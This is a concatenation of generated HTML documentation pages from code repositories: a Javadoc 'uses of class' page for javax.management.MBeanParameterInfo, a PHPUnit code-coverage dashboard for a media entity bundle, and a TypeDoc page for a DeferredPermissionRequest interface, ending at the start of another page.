<li><a href="MBeanParameterInfo.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class javax.management.MBeanParameterInfo" class="title">Uses of Class<br>javax.management.MBeanParameterInfo</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation">
<caption><span>Packages that use <a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Package</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="#javax.management">javax.management</a></td>
<td class="colLast">
<div class="block">Provides the core classes for the Java Management Extensions.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="#javax.management.modelmbean">javax.management.modelmbean</a></td>
<td class="colLast">
<div class="block">Provides the definition of the ModelMBean classes.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="#javax.management.openmbean">javax.management.openmbean</a></td>
<td class="colLast">
<div class="block">Provides the open data types and Open MBean descriptor classes.</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="javax.management">
<!-- -->
</a>
<h3>Uses of <a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a> in <a href="../../../javax/management/package-summary.html">javax.management</a></h3>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../javax/management/package-summary.html">javax.management</a> that return <a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a>[]</code></td>
<td class="colLast"><span class="strong">MBeanOperationInfo.</span><code><strong><a href="../../../javax/management/MBeanOperationInfo.html#getSignature()">getSignature</a></strong>()</code>
<div class="block">Returns the list of parameters for this operation.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a>[]</code></td>
<td class="colLast"><span class="strong">MBeanConstructorInfo.</span><code><strong><a href="../../../javax/management/MBeanConstructorInfo.html#getSignature()">getSignature</a></strong>()</code>
<div class="block">Returns the list of parameters for this constructor.</div>
</td>
</tr>
</tbody>
</table>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../javax/management/package-summary.html">javax.management</a> with parameters of type <a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>protected <a href="../../../java/lang/String.html" title="class in java.lang">String</a></code></td>
<td class="colLast"><span class="strong">StandardMBean.</span><code><strong><a href="../../../javax/management/StandardMBean.html#getDescription(javax.management.MBeanConstructorInfo,%20javax.management.MBeanParameterInfo,%20int)">getDescription</a></strong>(<a href="../../../javax/management/MBeanConstructorInfo.html" title="class in javax.management">MBeanConstructorInfo</a> ctor,
<a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a> param,
int sequence)</code>
<div class="block">Customization hook:
Get the description that will be used for the <var>sequence</var>
MBeanParameterInfo of the MBeanConstructorInfo returned by this MBean.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>protected <a href="../../../java/lang/String.html" title="class in java.lang">String</a></code></td>
<td class="colLast"><span class="strong">StandardMBean.</span><code><strong><a href="../../../javax/management/StandardMBean.html#getDescription(javax.management.MBeanOperationInfo,%20javax.management.MBeanParameterInfo,%20int)">getDescription</a></strong>(<a href="../../../javax/management/MBeanOperationInfo.html" title="class in javax.management">MBeanOperationInfo</a> op,
<a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a> param,
int sequence)</code>
<div class="block">Customization hook:
Get the description that will be used for the <var>sequence</var>
MBeanParameterInfo of the MBeanOperationInfo returned by this MBean.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>protected <a href="../../../java/lang/String.html" title="class in java.lang">String</a></code></td>
<td class="colLast"><span class="strong">StandardMBean.</span><code><strong><a href="../../../javax/management/StandardMBean.html#getParameterName(javax.management.MBeanConstructorInfo,%20javax.management.MBeanParameterInfo,%20int)">getParameterName</a></strong>(<a href="../../../javax/management/MBeanConstructorInfo.html" title="class in javax.management">MBeanConstructorInfo</a> ctor,
<a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a> param,
int sequence)</code>
<div class="block">Customization hook:
Get the name that will be used for the <var>sequence</var>
MBeanParameterInfo of the MBeanConstructorInfo returned by this MBean.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>protected <a href="../../../java/lang/String.html" title="class in java.lang">String</a></code></td>
<td class="colLast"><span class="strong">StandardMBean.</span><code><strong><a href="../../../javax/management/StandardMBean.html#getParameterName(javax.management.MBeanOperationInfo,%20javax.management.MBeanParameterInfo,%20int)">getParameterName</a></strong>(<a href="../../../javax/management/MBeanOperationInfo.html" title="class in javax.management">MBeanOperationInfo</a> op,
<a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a> param,
int sequence)</code>
<div class="block">Customization hook:
Get the name that will be used for the <var>sequence</var>
MBeanParameterInfo of the MBeanOperationInfo returned by this MBean.</div>
</td>
</tr>
</tbody>
</table>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing constructors, and an explanation">
<caption><span>Constructors in <a href="../../../javax/management/package-summary.html">javax.management</a> with parameters of type <a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colLast"><code><strong><a href="../../../javax/management/MBeanConstructorInfo.html#MBeanConstructorInfo(java.lang.String,%20java.lang.String,%20javax.management.MBeanParameterInfo[])">MBeanConstructorInfo</a></strong>(<a href="../../../java/lang/String.html" title="class in java.lang">String</a> name,
<a href="../../../java/lang/String.html" title="class in java.lang">String</a> description,
<a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a>[] signature)</code>
<div class="block">Constructs an <CODE>MBeanConstructorInfo</CODE> object.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colLast"><code><strong><a href="../../../javax/management/MBeanConstructorInfo.html#MBeanConstructorInfo(java.lang.String,%20java.lang.String,%20javax.management.MBeanParameterInfo[],%20javax.management.Descriptor)">MBeanConstructorInfo</a></strong>(<a href="../../../java/lang/String.html" title="class in java.lang">String</a> name,
<a href="../../../java/lang/String.html" title="class in java.lang">String</a> description,
<a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a>[] signature,
<a href="../../../javax/management/Descriptor.html" title="interface in javax.management">Descriptor</a> descriptor)</code>
<div class="block">Constructs an <CODE>MBeanConstructorInfo</CODE> object.</div>
</td>
</tr>
<tr class="altColor">
<td class="colLast"><code><strong><a href="../../../javax/management/MBeanOperationInfo.html#MBeanOperationInfo(java.lang.String,%20java.lang.String,%20javax.management.MBeanParameterInfo[],%20java.lang.String,%20int)">MBeanOperationInfo</a></strong>(<a href="../../../java/lang/String.html" title="class in java.lang">String</a> name,
<a href="../../../java/lang/String.html" title="class in java.lang">String</a> description,
<a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a>[] signature,
<a href="../../../java/lang/String.html" title="class in java.lang">String</a> type,
int impact)</code>
<div class="block">Constructs an <CODE>MBeanOperationInfo</CODE> object.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colLast"><code><strong><a href="../../../javax/management/MBeanOperationInfo.html#MBeanOperationInfo(java.lang.String,%20java.lang.String,%20javax.management.MBeanParameterInfo[],%20java.lang.String,%20int,%20javax.management.Descriptor)">MBeanOperationInfo</a></strong>(<a href="../../../java/lang/String.html" title="class in java.lang">String</a> name,
<a href="../../../java/lang/String.html" title="class in java.lang">String</a> description,
<a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a>[] signature,
<a href="../../../java/lang/String.html" title="class in java.lang">String</a> type,
int impact,
<a href="../../../javax/management/Descriptor.html" title="interface in javax.management">Descriptor</a> descriptor)</code>
<div class="block">Constructs an <CODE>MBeanOperationInfo</CODE> object.</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList"><a name="javax.management.modelmbean">
<!-- -->
</a>
<h3>Uses of <a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a> in <a href="../../../javax/management/modelmbean/package-summary.html">javax.management.modelmbean</a></h3>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing constructors, and an explanation">
<caption><span>Constructors in <a href="../../../javax/management/modelmbean/package-summary.html">javax.management.modelmbean</a> with parameters of type <a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colLast"><code><strong><a href="../../../javax/management/modelmbean/ModelMBeanConstructorInfo.html#ModelMBeanConstructorInfo(java.lang.String,%20java.lang.String,%20javax.management.MBeanParameterInfo[])">ModelMBeanConstructorInfo</a></strong>(<a href="../../../java/lang/String.html" title="class in java.lang">String</a> name,
<a href="../../../java/lang/String.html" title="class in java.lang">String</a> description,
<a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a>[] signature)</code>
<div class="block">Constructs a ModelMBeanConstructorInfo object with a default descriptor.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colLast"><code><strong><a href="../../../javax/management/modelmbean/ModelMBeanConstructorInfo.html#ModelMBeanConstructorInfo(java.lang.String,%20java.lang.String,%20javax.management.MBeanParameterInfo[],%20javax.management.Descriptor)">ModelMBeanConstructorInfo</a></strong>(<a href="../../../java/lang/String.html" title="class in java.lang">String</a> name,
<a href="../../../java/lang/String.html" title="class in java.lang">String</a> description,
<a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a>[] signature,
<a href="../../../javax/management/Descriptor.html" title="interface in javax.management">Descriptor</a> descriptor)</code>
<div class="block">Constructs a ModelMBeanConstructorInfo object.</div>
</td>
</tr>
<tr class="altColor">
<td class="colLast"><code><strong><a href="../../../javax/management/modelmbean/ModelMBeanOperationInfo.html#ModelMBeanOperationInfo(java.lang.String,%20java.lang.String,%20javax.management.MBeanParameterInfo[],%20java.lang.String,%20int)">ModelMBeanOperationInfo</a></strong>(<a href="../../../java/lang/String.html" title="class in java.lang">String</a> name,
<a href="../../../java/lang/String.html" title="class in java.lang">String</a> description,
<a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a>[] signature,
<a href="../../../java/lang/String.html" title="class in java.lang">String</a> type,
int impact)</code>
<div class="block">Constructs a ModelMBeanOperationInfo object with a default descriptor.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colLast"><code><strong><a href="../../../javax/management/modelmbean/ModelMBeanOperationInfo.html#ModelMBeanOperationInfo(java.lang.String,%20java.lang.String,%20javax.management.MBeanParameterInfo[],%20java.lang.String,%20int,%20javax.management.Descriptor)">ModelMBeanOperationInfo</a></strong>(<a href="../../../java/lang/String.html" title="class in java.lang">String</a> name,
<a href="../../../java/lang/String.html" title="class in java.lang">String</a> description,
<a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a>[] signature,
<a href="../../../java/lang/String.html" title="class in java.lang">String</a> type,
int impact,
<a href="../../../javax/management/Descriptor.html" title="interface in javax.management">Descriptor</a> descriptor)</code>
<div class="block">Constructs a ModelMBeanOperationInfo object.</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList"><a name="javax.management.openmbean">
<!-- -->
</a>
<h3>Uses of <a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a> in <a href="../../../javax/management/openmbean/package-summary.html">javax.management.openmbean</a></h3>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing subclasses, and an explanation">
<caption><span>Subclasses of <a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a> in <a href="../../../javax/management/openmbean/package-summary.html">javax.management.openmbean</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Class and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>class </code></td>
<td class="colLast"><code><strong><a href="../../../javax/management/openmbean/OpenMBeanParameterInfoSupport.html" title="class in javax.management.openmbean">OpenMBeanParameterInfoSupport</a></strong></code>
<div class="block">Describes a parameter used in one or more operations or
constructors of an open MBean.</div>
</td>
</tr>
</tbody>
</table>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../javax/management/openmbean/package-summary.html">javax.management.openmbean</a> that return <a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a>[]</code></td>
<td class="colLast"><span class="strong">OpenMBeanOperationInfo.</span><code><strong><a href="../../../javax/management/openmbean/OpenMBeanOperationInfo.html#getSignature()">getSignature</a></strong>()</code>
<div class="block">Returns an array of <tt>OpenMBeanParameterInfo</tt> instances
describing each parameter in the signature of the operation
described by this <tt>OpenMBeanOperationInfo</tt> instance.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">MBeanParameterInfo</a>[]</code></td>
<td class="colLast"><span class="strong">OpenMBeanConstructorInfo.</span><code><strong><a href="../../../javax/management/openmbean/OpenMBeanConstructorInfo.html#getSignature()">getSignature</a></strong>()</code>
<div class="block">Returns an array of <tt>OpenMBeanParameterInfo</tt> instances
describing each parameter in the signature of the constructor
described by this <tt>OpenMBeanConstructorInfo</tt> instance.</div>
</td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../javax/management/MBeanParameterInfo.html" title="class in javax.management">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
<div class="aboutLanguage"><em><strong>Java™ Platform<br>Standard Ed. 7</strong></em></div>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?javax/management/class-use/MBeanParameterInfo.html" target="_top">Frames</a></li>
<li><a href="MBeanParameterInfo.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small><font size="-1"> <a href="http://bugreport.sun.com/bugreport/">Submit a bug or feature</a> <br>For further API reference and developer documentation, see <a href="http://docs.oracle.com/javase/7/docs/index.html" target="_blank">Java SE Documentation</a>. That documentation contains more detailed, developer-targeted descriptions, with conceptual overviews, definitions of terms, workarounds, and working code examples.<br> <a href="../../../../legal/cpyr.html">Copyright</a> © 1993, 2015, Oracle and/or its affiliates. All rights reserved. </font></small></p>
</body>
</html>
|
doc/codecoverage/MediaBundle_Entity.dashboard.html
|
richtermarkbaay/MEDTrip
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Dashboard for /var/www/source/hca_draft/src/HealthCareAbroad/MediaBundle/Entity</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="css/bootstrap.min.css" rel="stylesheet">
<link href="css/bootstrap-responsive.min.css" rel="stylesheet">
<link href="css/style.css" rel="stylesheet">
<!--[if lt IE 9]>
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js" type="text/javascript"></script>
<![endif]-->
</head>
<body>
<header>
<div class="container">
<div class="row">
<div class="span12">
<ul class="breadcrumb">
<li><a href="index.html">/var/www/source/hca_draft/src/HealthCareAbroad</a> <span class="divider">/</span></li>
<li><a href="MediaBundle.html">MediaBundle</a> <span class="divider">/</span></li>
<li><a href="MediaBundle_Entity.html">Entity</a></li>
<li class="active">(Dashboard)</li>
</ul>
</div>
</div>
</div>
</header>
<div class="container">
<div class="row">
<div class="span6">
<h2>Class Coverage Distribution</h2>
<div id="classCoverageDistribution"></div>
</div>
<div class="span6">
<h2>Class Complexity</h2>
<div id="classComplexity"></div>
</div>
</div>
<div class="row">
<div class="span6">
<h2>Top Project Risks</h2>
<ul>
</ul>
</div>
<div class="span6">
<h2>Least Tested Methods</h2>
<ul>
<li><a href="MediaBundle_Entity_Media.php.html#225">Media::setWidth</a> (0%)</li>
<li><a href="MediaBundle_Entity_Media.php.html#236">Media::getWidth</a> (0%)</li>
<li><a href="MediaBundle_Entity_Media.php.html#247">Media::setHeight</a> (0%)</li>
<li><a href="MediaBundle_Entity_Media.php.html#214">Media::getMetadata</a> (0%)</li>
<li><a href="MediaBundle_Entity_Media.php.html#203">Media::setMetadata</a> (0%)</li>
<li><a href="MediaBundle_Entity_Media.php.html#181">Media::setContentType</a> (0%)</li>
<li><a href="MediaBundle_Entity_Media.php.html#192">Media::getContentType</a> (0%)</li>
<li><a href="MediaBundle_Entity_Media.php.html#258">Media::getHeight</a> (0%)</li>
<li><a href="MediaBundle_Entity_Media.php.html#269">Media::setDateCreated</a> (0%)</li>
<li><a href="MediaBundle_Entity_Media.php.html#324">Media::removeGallery</a> (0%)</li>
</ul>
</div>
</div>
<footer>
<p>
<small>Generated by <a href="http://github.com/sebastianbergmann/php-code-coverage" target="_top">PHP_CodeCoverage 1.2.2</a> using <a href="http://www.php.net/" target="_top">PHP 5.3.10-1ubuntu3.2</a> and <a href="http://phpunit.de/">PHPUnit 3.7.1</a> at Tue Oct 9 16:19:45 PHT 2012.</small>
</p>
</footer>
</div>
<script src="js/bootstrap.min.js" type="text/javascript"></script>
<script src="js/jquery.min.js" type="text/javascript"></script>
<script src="js/highcharts.js" type="text/javascript"></script>
<script type="text/javascript">
$(document).ready(function() {
var classCoverageDistribution = new Highcharts.Chart({
chart: {
renderTo: 'classCoverageDistribution',
type: 'column'
},
title: {text: ''},
legend: {enabled: false},
credits: {enabled: false},
tooltip: {enabled: false},
xAxis: {
labels: {style: {fontSize: '8px'}},
categories: [
'0%','0-10%','10-20%','20-30%','30-40%','40-50%','50-60%','60-70%','70-80%','80-90%','90-100%','100%'
]
},
yAxis: {
title: '',
labels: {style: {fontSize: '8px'}},
},
series: [{
data: [1,1,0,0,0,0,0,0,0,0,0,0]
}],
});
var classComplexity = new Highcharts.Chart({
chart: {
renderTo: 'classComplexity',
type: 'scatter'
},
title: {text: ''},
legend: {enabled: false},
credits: {enabled: false},
xAxis: {
title: {text: 'Code Coverage (in percent)'},
labels: {enabled: true},
},
yAxis: {
title: 'Cyclomatic Complexity',
labels: {enabled: true},
},
tooltip: {
formatter: function() {
return this.point.config[2];
}
},
series: [{
data: [[7.1428571428571,9,"<a href=\"MediaBundle_Entity_Gallery.php.html#10\">Gallery<\/a>"],[0,25,"<a href=\"MediaBundle_Entity_Media.php.html#10\">Media<\/a>"]],
marker: {
symbol: 'diamond'
}
}],
});
});
</script>
</body>
</html>
|
docs/picturepark-sdk-v1-widgets/api/interfaces/deferredpermissionrequest.html
|
Picturepark/Picturepark.SDK.TypeScript
|
<!doctype html>
<html class="default no-js">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>DeferredPermissionRequest | picturepark-sdk-v1-widgets API</title>
<meta name="description" content="Documentation for picturepark-sdk-v1-widgets API">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="../assets/css/main.css">
</head>
<body>
<header>
<div class="tsd-page-toolbar">
<div class="container">
<div class="table-wrap">
<div class="table-cell" id="tsd-search" data-index="../assets/js/search.json" data-base="..">
<div class="field">
<label for="tsd-search-field" class="tsd-widget search no-caption">Search</label>
<input id="tsd-search-field" type="text" />
</div>
<ul class="results">
<li class="state loading">Preparing search index...</li>
<li class="state failure">The search index is not available</li>
</ul>
<a href="../index.html" class="title">picturepark-sdk-v1-widgets API</a>
</div>
<div class="table-cell" id="tsd-widgets">
<div id="tsd-filter">
<a href="#" class="tsd-widget options no-caption" data-toggle="options">Options</a>
<div class="tsd-filter-group">
<div class="tsd-select" id="tsd-filter-visibility">
<span class="tsd-select-label">All</span>
<ul class="tsd-select-list">
<li data-value="public">Public</li>
<li data-value="protected">Public/Protected</li>
<li data-value="private" class="selected">All</li>
</ul>
</div>
<input type="checkbox" id="tsd-filter-inherited" checked />
<label class="tsd-widget" for="tsd-filter-inherited">Inherited</label>
<input type="checkbox" id="tsd-filter-externals" checked />
<label class="tsd-widget" for="tsd-filter-externals">Externals</label>
<input type="checkbox" id="tsd-filter-only-exported" />
<label class="tsd-widget" for="tsd-filter-only-exported">Only exported</label>
</div>
</div>
<a href="#" class="tsd-widget menu no-caption" data-toggle="menu">Menu</a>
</div>
</div>
</div>
</div>
<div class="tsd-page-title">
<div class="container">
<ul class="tsd-breadcrumb">
<li>
<a href="../globals.html">Globals</a>
</li>
<li>
<a href="deferredpermissionrequest.html">DeferredPermissionRequest</a>
</li>
</ul>
<h1>Interface DeferredPermissionRequest</h1>
</div>
</div>
</header>
<div class="container container-main">
<div class="row">
<div class="col-8 col-content">
<section class="tsd-panel tsd-hierarchy">
<h3>Hierarchy</h3>
<ul class="tsd-hierarchy">
<li>
<span class="target">DeferredPermissionRequest</span>
<ul class="tsd-hierarchy">
<li>
<a href="permissionrequest.html" class="tsd-signature-type">PermissionRequest</a>
</li>
</ul>
</li>
</ul>
</section>
<section class="tsd-panel-group tsd-index-group">
<h2>Index</h2>
<section class="tsd-panel tsd-index-panel">
<div class="tsd-index-content">
<section class="tsd-index-section tsd-is-external">
<h3>Properties</h3>
<ul class="tsd-index-list">
<li class="tsd-kind-property tsd-parent-kind-interface tsd-is-external"><a href="deferredpermissionrequest.html#id" class="tsd-kind-icon">id</a></li>
<li class="tsd-kind-property tsd-parent-kind-interface tsd-is-external"><a href="deferredpermissionrequest.html#type" class="tsd-kind-icon">type</a></li>
<li class="tsd-kind-property tsd-parent-kind-interface tsd-is-external"><a href="deferredpermissionrequest.html#uri" class="tsd-kind-icon">uri</a></li>
</ul>
</section>
<section class="tsd-index-section tsd-is-external">
<h3>Methods</h3>
<ul class="tsd-index-list">
<li class="tsd-kind-method tsd-parent-kind-interface tsd-is-external"><a href="deferredpermissionrequest.html#allow" class="tsd-kind-icon">allow</a></li>
<li class="tsd-kind-method tsd-parent-kind-interface tsd-is-external"><a href="deferredpermissionrequest.html#deny" class="tsd-kind-icon">deny</a></li>
</ul>
</section>
</div>
</section>
</section>
<section class="tsd-panel-group tsd-member-group tsd-is-external">
<h2>Properties</h2>
<section class="tsd-panel tsd-member tsd-kind-property tsd-parent-kind-interface tsd-is-external">
<a name="id" class="tsd-anchor"></a>
<h3><span class="tsd-flag ts-flagReadonly">Readonly</span> id</h3>
<div class="tsd-signature tsd-kind-icon">id<span class="tsd-signature-symbol">:</span> <span class="tsd-signature-type">number</span></div>
<aside class="tsd-sources">
<ul>
<li>Defined in node_modules/typescript/lib/lib.dom.d.ts:4275</li>
</ul>
</aside>
</section>
<section class="tsd-panel tsd-member tsd-kind-property tsd-parent-kind-interface tsd-is-external">
<a name="type" class="tsd-anchor"></a>
<h3><span class="tsd-flag ts-flagReadonly">Readonly</span> type</h3>
<div class="tsd-signature tsd-kind-icon">type<span class="tsd-signature-symbol">:</span> <a href="../globals.html#mswebviewpermissiontype" class="tsd-signature-type">MSWebViewPermissionType</a></div>
<aside class="tsd-sources">
<ul>
<li>Defined in node_modules/typescript/lib/lib.dom.d.ts:4276</li>
</ul>
</aside>
</section>
<section class="tsd-panel tsd-member tsd-kind-property tsd-parent-kind-interface tsd-is-external">
<a name="uri" class="tsd-anchor"></a>
<h3><span class="tsd-flag ts-flagReadonly">Readonly</span> uri</h3>
<div class="tsd-signature tsd-kind-icon">uri<span class="tsd-signature-symbol">:</span> <span class="tsd-signature-type">string</span></div>
<aside class="tsd-sources">
<ul>
<li>Defined in node_modules/typescript/lib/lib.dom.d.ts:4277</li>
</ul>
</aside>
</section>
</section>
<section class="tsd-panel-group tsd-member-group tsd-is-external">
<h2>Methods</h2>
<section class="tsd-panel tsd-member tsd-kind-method tsd-parent-kind-interface tsd-is-external">
<a name="allow" class="tsd-anchor"></a>
<h3>allow</h3>
<ul class="tsd-signatures tsd-kind-method tsd-parent-kind-interface tsd-is-external">
<li class="tsd-signature tsd-kind-icon">allow<span class="tsd-signature-symbol">(</span><span class="tsd-signature-symbol">)</span><span class="tsd-signature-symbol">: </span><span class="tsd-signature-type">void</span></li>
</ul>
<ul class="tsd-descriptions">
<li class="tsd-description">
<aside class="tsd-sources">
<ul>
<li>Defined in node_modules/typescript/lib/lib.dom.d.ts:4278</li>
</ul>
</aside>
<h4 class="tsd-returns-title">Returns <span class="tsd-signature-type">void</span></h4>
</li>
</ul>
</section>
<section class="tsd-panel tsd-member tsd-kind-method tsd-parent-kind-interface tsd-is-external">
<a name="deny" class="tsd-anchor"></a>
<h3>deny</h3>
<ul class="tsd-signatures tsd-kind-method tsd-parent-kind-interface tsd-is-external">
<li class="tsd-signature tsd-kind-icon">deny<span class="tsd-signature-symbol">(</span><span class="tsd-signature-symbol">)</span><span class="tsd-signature-symbol">: </span><span class="tsd-signature-type">void</span></li>
</ul>
<ul class="tsd-descriptions">
<li class="tsd-description">
<aside class="tsd-sources">
<ul>
<li>Defined in node_modules/typescript/lib/lib.dom.d.ts:4279</li>
</ul>
</aside>
<h4 class="tsd-returns-title">Returns <span class="tsd-signature-type">void</span></h4>
</li>
</ul>
</section>
</section>
</div>
<div class="col-4 col-menu menu-sticky-wrap menu-highlight">
<nav class="tsd-navigation primary">
<ul>
<li class="globals ">
<a href="../globals.html"><em>Globals</em></a>
</li>
</ul>
</nav>
<nav class="tsd-navigation secondary menu-sticky">
<ul class="before-current">
</ul>
<ul class="current">
<li class="current tsd-kind-interface tsd-is-external">
<a href="deferredpermissionrequest.html" class="tsd-kind-icon">Deferred<wbr>Permission<wbr>Request</a>
<ul>
<li class=" tsd-kind-property tsd-parent-kind-interface tsd-is-external">
<a href="deferredpermissionrequest.html#id" class="tsd-kind-icon">id</a>
</li>
<li class=" tsd-kind-property tsd-parent-kind-interface tsd-is-external">
<a href="deferredpermissionrequest.html#type" class="tsd-kind-icon">type</a>
</li>
<li class=" tsd-kind-property tsd-parent-kind-interface tsd-is-external">
<a href="deferredpermissionrequest.html#uri" class="tsd-kind-icon">uri</a>
</li>
<li class=" tsd-kind-method tsd-parent-kind-interface tsd-is-external">
<a href="deferredpermissionrequest.html#allow" class="tsd-kind-icon">allow</a>
</li>
<li class=" tsd-kind-method tsd-parent-kind-interface tsd-is-external">
<a href="deferredpermissionrequest.html#deny" class="tsd-kind-icon">deny</a>
</li>
</ul>
</li>
</ul>
<ul class="after-current">
</ul>
</nav>
</div>
</div>
</div>
<footer class="with-border-bottom">
<div class="container">
<h2>Legend</h2>
<div class="tsd-legend-group">
<ul class="tsd-legend">
<li class="tsd-kind-function"><span class="tsd-kind-icon">Function</span></li>
</ul>
</div>
</div>
</footer>
<div class="container tsd-generator">
<p>Generated using <a href="https://typedoc.org/" target="_blank">TypeDoc</a></p>
</div>
<div class="overlay"></div>
<script src="../assets/js/main.js"></script>
</body>
</html>
|
place/romania/statistics/2013/index.html
|
okfn/opendataindex-2015
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
